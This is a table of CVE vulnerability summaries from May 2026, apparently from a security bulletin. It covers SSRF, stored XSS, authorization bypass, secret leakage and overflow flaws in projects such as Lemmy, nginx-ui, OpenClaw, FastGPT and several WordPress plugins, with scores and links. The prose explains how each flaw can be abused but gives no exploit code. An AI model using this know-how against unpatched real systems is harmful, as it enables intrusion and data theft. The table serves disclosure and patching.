| titraio--titra | titra is an open source time tracking project. In version 0.99.52, the globalsettings Meteor publication returns all global settings without any admin or role check. Any authenticated user can subscribe via DDP and receive sensitive configuration fields such as google_secret, openai_apikey, and google_clientid. At time of publication no public patch is available. | 2026-05-04 | 6.5 | CVE-2026-42092 | https://github.com/titraio/titra/security/advisories/GHSA-4h9p-49hg-vppw |
| GreycLab--CImg | CImg Library is a C++ library for image processing. Prior to commit 4ca26bc, there is an integer overflow vulnerability in the W*H*D size computation inside _load_pnm() that can bypass the memory allocation guard. A crafted PNM/PGM/PPM file with large dimension values causes the overflow to wrap around, allocating an undersized buffer and potentially triggering a heap buffer overflow. Any application using CImg to load untrusted image files is affected. This issue has been patched via commit 4ca26bc. | 2026-05-04 | 6.1 | CVE-2026-42144 | https://github.com/GreycLab/CImg/security/advisories/GHSA-4663-63fm-44gc https://github.com/GreycLab/CImg/issues/478 https://github.com/GreycLab/CImg/commit/4ca26bce4d8c61fcd1507d5f9401b9fb1222c27d https://github.com/GreycLab/CImg/releases/tag/v.3.7.5 |
| Erudika--scoold | Scoold is a Q&A and a knowledge sharing platform for teams. Prior to version 1.67.0, Scoold allows the admins configuration value to be modified through /api/config/set/admins with a forged Bearer token that is accepted as an admin API token. Once that setting is changed, the target email address is written to the application configuration file. The change does not become active immediately in the current process, because the ADMINS set is loaded once at startup. After a Scoold restart, though, the selected user is recognized as an administrator and gains access to the admin panel. This issue gives an attacker a reliable persistence path: write their own email into scoold.admins, wait for a restart or trigger one operationally, and the account comes back as admin. This issue has been patched in version 1.67.0. | 2026-05-08 | 6.7 | CVE-2026-42176 | https://github.com/Erudika/scoold/security/advisories/GHSA-7qfx-c234-xg4g https://github.com/Erudika/scoold/releases/tag/1.67.0 |
| LemmyNet--lemmy | Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy allows an authenticated low-privileged user to create a link post through POST /api/v3/post. When a post is created in a public community, the backend asynchronously sends a Webmention to the attacker-controlled link target. The submitted URL is checked for syntax and scheme, but the audited code path does not reject loopback, private, or link-local destinations before the Webmention request is issued. This lets a normal user trigger server-side HTTP requests toward internal services. This issue has been patched in version 0.19.18. | 2026-05-08 | 6.3 | CVE-2026-42180 | https://github.com/LemmyNet/lemmy/security/advisories/GHSA-3jvj-v6w2-h948 https://github.com/LemmyNet/lemmy/releases/tag/0.19.18 |
| LemmyNet--lemmy | Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18. | 2026-05-08 | 6.5 | CVE-2026-42181 | https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq https://github.com/LemmyNet/lemmy/releases/tag/0.19.18 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the incomplete SSRF fix in Admidio's fetch_metadata.php validates the resolved IP address but passes the original hostname-based URL to curl_init(), leaving a DNS rebinding TOCTOU window that allows redirecting requests to internal IPs. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.8 | CVE-2026-42194 | https://github.com/Admidio/admidio/security/advisories/GHSA-hcjj-chvw-fmw9 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| becheran--grid | Grid is a data structure grid for rust. From version 0.17.0 to before version 1.0.1, an integer overflow in Grid::expand_rows() can corrupt the relationship between the grid's logical dimensions and its backing storage. After the internal invariant is broken, the safe API get() may invoke get_unchecked() with an invalid index, resulting in Undefined Behavior. This issue has been patched in version 1.0.1. | 2026-05-08 | 6.2 | CVE-2026-42199 | https://github.com/becheran/grid/security/advisories/GHSA-38c5-483c-4qqp https://github.com/becheran/grid/commit/be213bd3528727148bef2d523c89e95d1fd9c072 https://github.com/becheran/grid/releases/tag/v1.0.1 |
| almirhodzic--nova-toggle-5 | nova-toggle-5 enables fliping booleans in the index. Prior to version 1.3.0, the toggle endpoint (POST/nova-vendor/nova-toggle/toggle/{resource}/{resourceId}) was protected only by web + auth:<guard> middleware. Any user authenticated on the configured guard could call the endpoint and flip boolean attributes on any Nova resource - including users who do not have access to Nova itself (for example, frontend customers sharing the web guard with the Nova admin area). The endpoint also accepted an arbitrary attribute parameter, which meant a valid caller could toggle any boolean column on the underlying model - not just columns exposed as Toggle fields on the resource. This issue has been patched in version 1.3.0. | 2026-05-08 | 6.5 | CVE-2026-42202 | https://github.com/almirhodzic/nova-toggle-5/security/advisories/GHSA-f5c8-m5vw-rmgq https://github.com/almirhodzic/nova-toggle-5/releases/tag/v1.3.0 |
| halfgaar--FlashMQ | FlashMQ is a MQTT broker/server, designed for multi-CPU environments. Prior to version 1.26.1, a remote client with retained publish permission can crash the FlashMQ broker when both set_retained_message_defer_timeout and set_retained_message_defer_timeout_spread are configured to non-default values, resulting in denial of service. If anonymous retained publishing is allowed, no authentication is required; otherwise, the attacker needs the corresponding publish permission. This issue has been patched in version 1.26.1. | 2026-05-08 | 6.5 | CVE-2026-42209 | https://github.com/halfgaar/FlashMQ/security/advisories/GHSA-2789-vfcg-5922 https://github.com/halfgaar/FlashMQ/issues/167 https://github.com/halfgaar/FlashMQ/commit/193b6e7767889511cfa8e933908ea5e6a1077a1f https://github.com/halfgaar/FlashMQ/releases/tag/v1.26.1 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, an authenticated user can call GET /api/settings and retrieve sensitive configuration values, including node.secret. The same node.secret is accepted by AuthRequired() through the X-Node-Secret header (or node_secret query parameter), causing the request to be treated as authenticated via the trusted-node path and associated with the init user. This issue has been patched in version 2.3.8. | 2026-05-04 | 6.5 | CVE-2026-42220 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-7jrr-xw9c-mj39 https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, the GetSettings API handler (api/settings/settings.go:24-65) serializes all settings structs to JSON and returns them to authenticated users. Many sensitive fields are tagged with protected:"true" - however, this tag is only enforced during writes (via ProtectedFill in SaveSettings) and is completely ignored during reads. This exposes 40+ protected fields including JwtSecret (enabling auth token forgery), NodeSecret (enabling cluster node impersonation), OIDC ClientSecret (enabling OAuth account takeover), and the IP whitelist configuration. This issue has been patched in version 2.3.8. | 2026-05-04 | 6.5 | CVE-2026-42223 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-q4w7-56hr-83rm https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8 |
| onyx-dot-app--onyx | Onyx is an open-source AI platform. Prior to versions 3.0.9, 3.1.6, and 3.2.6, the GET /chat/file/{file_id} endpoint allows any authenticated user to download any other user's uploaded files by providing the file UUID. The endpoint verifies the caller is authenticated but never checks that the file belongs to them. An attacker who knows or obtains a file UUID can access confidential documents, chat attachments, and other files uploaded by any user in the system. This issue has been patched in versions 3.0.9, 3.1.6, and 3.2.6. | 2026-05-08 | 6.5 | CVE-2026-42277 | https://github.com/onyx-dot-app/onyx/security/advisories/GHSA-vg3h-35f7-7w6r |
| Syslifters--sysreptor | SysReptor is a fully customizable pentest reporting platform. From version 2026.4 to before version 2026.27, the endpoints for reading and creating sharing links for personal notes is not properly authorized. This allows authenticated attackers who obtain the note ID of victim users to list and create sharing links to those users' personal notes. This gives attackers read and write access to notes of other users. This exploit works in both SysReptor Professional and Community. In Community it has, however, no impact because all users have superuser permissions and can list personal notes of other users at /admin/pentests/usernotebookpage/. This issue has been patched in version 2026.27. | 2026-05-08 | 6.8 | CVE-2026-42291 | https://github.com/Syslifters/sysreptor/security/advisories/GHSA-pcpr-q2qj-3v43 https://github.com/Syslifters/sysreptor/releases/tag/2026.27 |
| labring--FastGPT | FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts is vulnerable to DNS rebinding (TOCTOU - Time-of-Check to Time-of-Use). The function resolves the hostname via dns.resolve4()/dns.resolve6() and checks resolved IPs against private ranges, but the actual HTTP request happens in a separate call with a new DNS resolution, allowing the DNS record to change between validation and fetch. At time of publication, there are no publicly available patches. | 2026-05-08 | 6.3 | CVE-2026-42344 | https://github.com/labring/FastGPT/security/advisories/GHSA-cc8x-jrqv-hmwh |
| gitroomhq--postiz-app | Postiz is an AI social media scheduling tool. From version 2.16.6 to before version 2.21.7, all SSRF protections added in v2.21.4-v2.21.6 share a fundamental TOCTOU (Time-of-Check-Time-of-Use) vulnerability: isSafePublicHttpsUrl() resolves DNS to validate the target IP, but subsequent fetch() calls resolve DNS independently. An attacker controlling a DNS server can exploit this gap via DNS rebinding to redirect requests to internal network addresses. This issue has been patched in version 2.21.7. | 2026-05-08 | 6.5 | CVE-2026-42346 | https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-f7jj-p389-4w45 https://github.com/gitroomhq/postiz-app/commit/071143dcb01cdeb9d5d7019892f4c6ff7b19dbeb https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.7 |
| GeoVision Inc.--GV-LPC2011/LPC2211 | A privilege escalation vulnerability exists in the Web Interface / ssi.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted HTTP request can lead to credentials leak. An attacker can visit a webpage to trigger this vulnerability. | 2026-05-04 | 6.5 | CVE-2026-42367 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an authorization bypass vulnerability allowing operator.write message-tool paths to access Matrix profile persistence requiring admin-level authority. Attackers can exploit insufficient access controls to mutate persistent profile configuration through non-owner message-tool runs. | 2026-05-05 | 6.5 | CVE-2026-42433 | GitHub Security Advisory (GHSA-7jp6-r74r-995q) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Unauthorized Matrix Profile Config Persistence Access via operator.write Message Tools |
| grimmory-tools--grimmory | Grimmory is a self-hosted digital library. Prior to version 2.3.1, a stored cross-site scripting (XSS) vulnerability in Grimmory's browser-based EPUB reader allows an attacker to embed arbitrary JavaScript in a crafted EPUB file. When a victim opens the book, the script executes in their browser with full access to the Grimmory application's session context. This can enable session token theft and account takeover, including administrative access if an administrator opens the affected book. This issue has been patched in version 2.3.1. | 2026-05-08 | 6.3 | CVE-2026-42451 | https://github.com/grimmory-tools/grimmory/security/advisories/GHSA-frv6-5wq5-9p24 http://github.com/grimmory-tools/grimmory/releases/tag/v2.3.1 |
| chainguard-dev--apko | apko allows users to build and publish OCI container images built from apk packages. Prior to version 1.2.7, DiscoverKeys in pkg/apk/apk/implementation.go unconditionally type-asserts JWKS keys as *rsa.PublicKey without checking the key type. If a repository JWKS endpoint returns a non-RSA key (e.g. EC), the unchecked assertion panics and crashes apko. This affects any workflow that initializes the APK database and fetches repository keys. This issue has been patched in version 1.2.7. | 2026-05-09 | 6.5 | CVE-2026-42576 | https://github.com/chainguard-dev/apko/security/advisories/GHSA-m7hm-vm4x-28jf https://github.com/chainguard-dev/apko/commit/6604826b19e36e9bc6e196592800fad93738f4a1 https://github.com/chainguard-dev/apko/releases/tag/v1.2.7 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.14 contains a redaction bypass vulnerability that allows authenticated gateway clients to receive unredacted secrets through sourceConfig and runtimeConfig alias fields. Attackers with config read access can exploit this to obtain provider API keys, gateway authentication material, and channel credentials that should have been redacted. | 2026-05-05 | 6.5 | CVE-2026-43528 | GitHub Security Advisory (GHSA-8372-7vhw-cm6q) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.14 - Redaction Bypass via sourceConfig and runtimeConfig Aliases |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.14 contains an authorization context reuse vulnerability in collect-mode queue batches that allows messages from different senders to inherit the final sender's authorization context. Attackers can exploit this by sending multiple queued messages to drain batches using a more privileged sender's context, causing earlier messages to execute with elevated permissions. | 2026-05-05 | 6.8 | CVE-2026-43535 | GitHub Security Advisory (GHSA-jwrq-8g5x-5fhm) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.14 - Authorization Context Reuse in Collect-Mode Queue Batches |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a path traversal vulnerability in the screen_record tool's outPath parameter that bypasses workspace-only filesystem guards. Attackers can exploit this by specifying an outPath outside the workspace boundary to write files to unintended locations on the system. | 2026-05-05 | 6.5 | CVE-2026-43567 | GitHub Security Advisory (GHSA-jf25-7968-h2h5) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Path Traversal in screen_record outPath Parameter |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.5 before 2026.4.10 contain a privilege escalation vulnerability allowing write-scoped operators to modify persistent memory dreaming settings. Attackers with write-scoped gateway access can toggle admin-class configuration mutations through the /dreaming endpoint to escalate privileges. | 2026-05-05 | 6.5 | CVE-2026-43568 | GitHub Security Advisory (GHSA-5gjc-grvm-m88j) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.5 < 2026.4.10 - Privilege Escalation via Memory Dreaming Configuration in /dreaming Endpoint |
| OpenClaw--OpenClaw | OpenClaw versions 2026.3.22 before 2026.4.5 contain a symlink traversal vulnerability in remote marketplace repository path handling that allows attackers to escape the expected repository root. Attackers can exploit this by providing crafted symlink paths to access files outside the intended repository directory. | 2026-05-05 | 6.5 | CVE-2026-43570 | GitHub Security Advisory (GHSA-cr8r-7g2h-6wr6) Patch Commit (1) Patch Commit (2) VulnCheck Advisory: OpenClaw 2026.3.22 < 2026.4.5 - Symlink Traversal in Remote Marketplace Repository Path Handling |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.12 contains an improper authorization vulnerability in helper-backed channels where empty resolved approver lists are interpreted as explicit approval authorization. Attackers can resolve pending approvals without proper authorization by exploiting this logic flaw if they know an approval id. | 2026-05-05 | 6.5 | CVE-2026-43574 | GitHub Security Advisory (GHSA-49cg-279w-m73x) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.12 - Improper Authorization via Empty Approver Lists |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.9 contains a file read vulnerability allowing attackers to bypass navigation guards through browser act/evaluate interactions. Attackers can pivot into the local CDP origin and create or read disallowed file:// pages despite direct navigation policy restrictions. | 2026-05-06 | 6.5 | CVE-2026-43577 | GitHub Security Advisory (GHSA-qmwg-qprg-3j38) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.9 - Arbitrary File Read via Browser Interaction Routes |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an insufficient access control vulnerability in Nostr plugin HTTP profile routes that allows operators with write permissions to persist profile configuration without requiring admin authority. Attackers with operator.write scope can modify Nostr profile settings through unprotected mutation endpoints to gain unauthorized configuration persistence. | 2026-05-06 | 6.5 | CVE-2026-43579 | GitHub Security Advisory (GHSA-f3h5-h452-vp3j) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Insufficient Access Control in Nostr Profile Mutation Routes |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a server-side request forgery vulnerability in browser navigation policy that allows attackers to bypass hostname validation through DNS rebinding attacks. Attackers can exploit inconsistent hostname resolution between validation and actual network requests to pivot to internal resources via unallowlisted hostname URLs. | 2026-05-06 | 6.3 | CVE-2026-43582 | GitHub Security Advisory (GHSA-xq94-r468-qwgj) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - DNS Rebinding SSRF via Hostname Validation Bypass |
| roxnor--ElementsKit Elementor Addons Advanced Widgets & Templates Addons for Elementor | The ElementsKit Elementor Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `Live_Action::reset()` function in all versions up to, and including, 3.8.2 The function is hooked to the WordPress `init` action and triggers when both `post` and `action=elementor` GET parameters are present, with no authentication or nonce verification. This makes it possible for unauthenticated attackers to overwrite the Elementor content (`_elementor_data`) of any `elementskit_widget` custom post type by visiting a specially crafted URL. The widget's custom designs, text, and configurations are permanently replaced with a blank template. | 2026-05-05 | 6.5 | CVE-2026-4362 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7740fdfb-65b2-4d27-935f-b0e73487f0c4?source=cve https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/live-action.php#L27 https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/live-action.php#L10 https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/init.php#L37 https://plugins.trac.wordpress.org/changeset/3499543/elementskit-lite/trunk/modules/widget-builder/live-action.php https://plugins.trac.wordpress.org/changeset?old_path=%2Felementskit-lite/tags/3.8.2&new_path=%2Felementskit-lite/tags/3.9.0 |
| wpkube--Subscribe To Comments Reloaded | The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys and manage comment subscription preferences for arbitrary users | 2026-05-05 | 6.5 | CVE-2026-4409 | https://www.wordfence.com/threat-intel/vulnerabilities/id/91f9235e-f578-475f-92c3-34062d6d1e3d?source=cve https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/wp_subscribe_reloaded.php#L1613 https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/utils/stcr_utils.php#L164 https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/templates/user.php#L37 |
| labring--FastGPT | FastGPT is an AI Agent building platform. Prior to version 4.14.17, FastGPT had an inconsistent SSRF protection gap in MCP tool URL handling. The direct MCP preview/run endpoints already rejected internal/private network URLs, but the MCP tool create/update endpoints could still save an internal MCP server URL. That stored URL could later be used by workflow execution without revalidating the destination. An authenticated user with permission to create or manage MCP toolsets could store an internal endpoint such as http://localhost:3000/mcp and later cause the FastGPT backend workflow runner to connect to that internal destination. This issue has been patched in version 4.14.17. | 2026-05-08 | 6.3 | CVE-2026-44284 | https://github.com/labring/FastGPT/security/advisories/GHSA-cxxj-99f7-f5wq https://github.com/labring/FastGPT/pull/6826 https://github.com/labring/FastGPT/commit/c1c6b9520d976d25ed945b5bc4e0768149e6db69 https://github.com/labring/FastGPT/releases/tag/v4.14.17 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. From version 2.4.1 to before version 4.6.34, PraisonAI exposes optional SQL/CQL-backed knowledge-store implementations that build table and index identifiers from unvalidated name and collection arguments. Applications that pass untrusted collection names into these backends can trigger SQL or CQL injection. This issue has been patched in version 4.6.34. | 2026-05-08 | 6.3 | CVE-2026-44337 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0450, a heap buffer overflow exists in read_compound() in src/spellfile.c when loading a crafted spell file (.spl) with UTF-8 encoding active. An attacker-controlled length field in the spell file's compound section overflows a 32-bit signed integer multiplication, causing a small buffer to be allocated for a write loop that runs many iterations, overflowing the heap. Because the 'spelllang' option can be set from a modeline, a text file modeline can trigger spell file loading if a malicious .spl file has been planted on the runtimepath. This issue has been patched in version 9.2.0450. | 2026-05-08 | 6.6 | CVE-2026-45130 | https://github.com/vim/vim/security/advisories/GHSA-q4jv-r9gj-6cwv https://github.com/vim/vim/commit/92993329178cb1f72d700fff45ca86e1c2d369f8 https://github.com/vim/vim/releases/tag/v9.2.0450 |
| Hex-Rays--IDA | Hex-Rays IDA Pro 9.2 and 9.3 before 9.3sp2 does not block Clang dependency-file generation (via argument injection), which allows attackers to place their code into a plugins directory if the victim uses an attacker-supplied .i64 file. | 2026-05-09 | 6.5 | CVE-2026-45181 | https://blog.calif.io/p/using-ida-to-find-bugs-in-ida-with https://docs.hex-rays.com/release-notes/9_3sp2 |
| KDE--Kdenlive | Kdenlive before 26.04.1 allows dangerous proxy parameters when an attacker-controlled project file is used. | 2026-05-09 | 6.5 | CVE-2026-45184 | https://commits.kde.org/kdenlive/94042ddd259551e4a7a5f6672329752972c84685 https://commits.kde.org/kdenlive/c3999aacc6da54756f3df8aab03b900459562ecd https://kde.org/info/security/advisory-20260508-1.txt |
| shapedplugin--Carousel, Slider, Photo Gallery with Lightbox, Video Slider, by WP Carousel | The WP Carousel Free plugin for WordPress is vulnerable to Stored Cross-Site Scripting via crafted fancybox `data-caption` attributes in all versions up to, and including, 2.7.10. This is due to the `fancybox-config.js` script reading the carousel container's `id` attribute directly from the DOM to construct a jQuery selector without sanitization. When a Contributor crafts an HTML block with a malformed carousel container ID (containing characters invalid for jQuery selectors), the custom fancybox configuration throws a JavaScript error and fails to initialize. This causes the bundled fancybox library (v3.5.7) to fall back to its default caption handling, which renders the `data-caption` attribute content as raw HTML. Since WordPress allows `data-*` attributes through `wp_kses_post()`, this makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks an image in the crafted carousel lightbox. | 2026-05-05 | 6.4 | CVE-2026-4665 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e75815a3-2414-47f3-b0c4-e5d3e2cb369d?source=cve https://plugins.trac.wordpress.org/browser/wp-carousel-free/tags/2.7.10/public/js/fancybox-config.js#L3 https://plugins.trac.wordpress.org/browser/wp-carousel-free/trunk/public/js/fancybox-config.js#L3 https://plugins.trac.wordpress.org/changeset/3506878/wp-carousel-free/trunk/public/js/fancybox.js |
| commonninja--Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website | The Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'chartid' shortcode attribute in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 6.4 | CVE-2026-4730 | https://www.wordfence.com/threat-intel/vulnerabilities/id/491c7680-d270-41ed-a756-9397a0bd86bc?source=cve https://wordpress.org/plugins/charts-ninja-graphs-and-charts https://plugins.trac.wordpress.org/browser/charts-ninja-graphs-and-charts/tags/2.1.0/chartsninja.php#L24 https://plugins.trac.wordpress.org/browser/charts-ninja-graphs-and-charts/trunk/chartsninja.php#L24 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.6.10.6. This is due to a flawed authorization logic in the nonce_permissions_check() method combined with the public exposure of a site-wide reusable nonce. The plugin exposes a public_nonce value through the /wp-json/ssa/v1/embed-inner endpoint, which is accessible to unauthenticated users. The appointment deletion endpoint at /wp-json/ssa/v1/appointments/{id}/delete and /wp-json/ssa/v1/appointments/bulk use a permission check that accepts requests containing both an X-WP-Nonce header (with any arbitrary value) and an X-PUBLIC-Nonce header (with the valid public nonce). When the X-WP-Nonce validation fails, the function falls back to validating the X-PUBLIC-Nonce without properly rejecting the request. Since the public_nonce is exposed to all unauthenticated visitors and is site-wide (not user-specific or appointment-specific), attackers can obtain it and use it to view details of arbitrary appointments, including the public_edit_url, or delete arbitrary appointments by ID. This makes it possible for unauthenticated attackers to view, delete or modify any appointment in the system, disclosing sensitive appointment data, causing service disruption, and loss of booking records. | 2026-05-07 | 6.5 | CVE-2026-4807 | https://www.wordfence.com/threat-intel/vulnerabilities/id/436ab843-7729-4d57-9c9e-2ede2f101ddb?source=cve https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/lib/td-util/class-td-api-model.php#L361 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/lib/td-util/class-td-api-model.php#L110 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/class-appointment-model.php#L698 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/class-shortcodes.php#L889 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/booking-app-new/iframe-inner.php#L444 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/class-bootstrap.php#L151 https://plugins.trac.wordpress.org/changeset/3511993/simply-schedule-appointments/trunk/includes |
| wproyal--Royal Addons for Elementor Addons and Templates Kit for Elementor | The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that exploitation requires that an administrator has previously configured the Instagram Feed widget with a valid Instagram access token on the site. | 2026-05-05 | 6.4 | CVE-2026-5159 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ee96d8c5-baf0-4c5c-9ace-e88bbb95ee0a?source=cve https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5528-L5530 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5528-L5530 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5623-L5625 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5623-L5625 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L2181-L2193 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L2181-L2193 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3514368%40royal-elementor-addons%2Ftrunk&old=3503219%40royal-elementor-addons%2Ftrunk&sfp_email=&sfph_mail= |
| mirceatm--NMR Strava activities | The NMR Strava activities plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `strava_nmr_connect` shortcode in all versions up to, and including, 1.0.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-08 | 6.4 | CVE-2026-5341 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7e033919-ca00-4789-8635-b4189e1499ef?source=cve https://plugins.trac.wordpress.org/browser/nmr-strava-activities/tags/1.0.14/nmr-strava-activities.php#L247 https://plugins.trac.wordpress.org/browser/nmr-strava-activities/tags/1.0.14/nmr-strava-activities.php#L259 https://plugins.trac.wordpress.org/browser/nmr-strava-activities/tags/1.0.15/nmr-strava-activities.php#L240 https://plugins.trac.wordpress.org/browser/nmr-strava-activities/tags/1.0.15/nmr-strava-activities.php#L251 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3524779%40nmr-strava-activities%2Ftrunk&old=3520018%40nmr-strava-activities%2Ftrunk&sfp_email=&sfph_mail= |
| bitacre--WP-Clippy | The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `clippy` shortcode in all versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 6.4 | CVE-2026-5505 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ec49ed83-a09d-460d-be34-0fb79032b543?source=cve https://plugins.trac.wordpress.org/browser/wp-clippy/tags/1.0.0/wp-clippy.php#L23 https://plugins.trac.wordpress.org/browser/wp-clippy/trunk/wp-clippy.php#L23 https://plugins.trac.wordpress.org/browser/wp-clippy/tags/1.0.0/wp-clippy.php#L26 https://plugins.trac.wordpress.org/browser/wp-clippy/trunk/wp-clippy.php#L26 |
| servmask--All-in-One WP Migration Unlimited Extension | The All-in-One WP Migration Unlimited Extension plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.83. This is due to the 'Ai1wmve_Schedules_Controller::save' handler for 'admin_post_ai1wm_schedule_event_save' not verifying user capabilities before saving schedule data. This makes it possible for authenticated attackers, with subscriber-level access and above, to create scheduled export jobs and send backup notifications to attacker-controlled email addresses. Because such notifications include the random backup filename, full site backups can subsequently be downloaded from the target site, resulting in sensitive information exposure. | 2026-05-06 | 6.5 | CVE-2026-5753 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8a31080-c124-49be-b9d1-7bc5abe7cbda?source=cve https://help.servmask.com/knowledgebase/unlimited-extension-changelog/ |
| DivvyDrive Information Technologies Inc.--DivvyDrive | Cross-Site request forgery (CSRF) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Cross Site Request Forgery. This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2. | 2026-05-07 | 6.5 | CVE-2026-5791 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
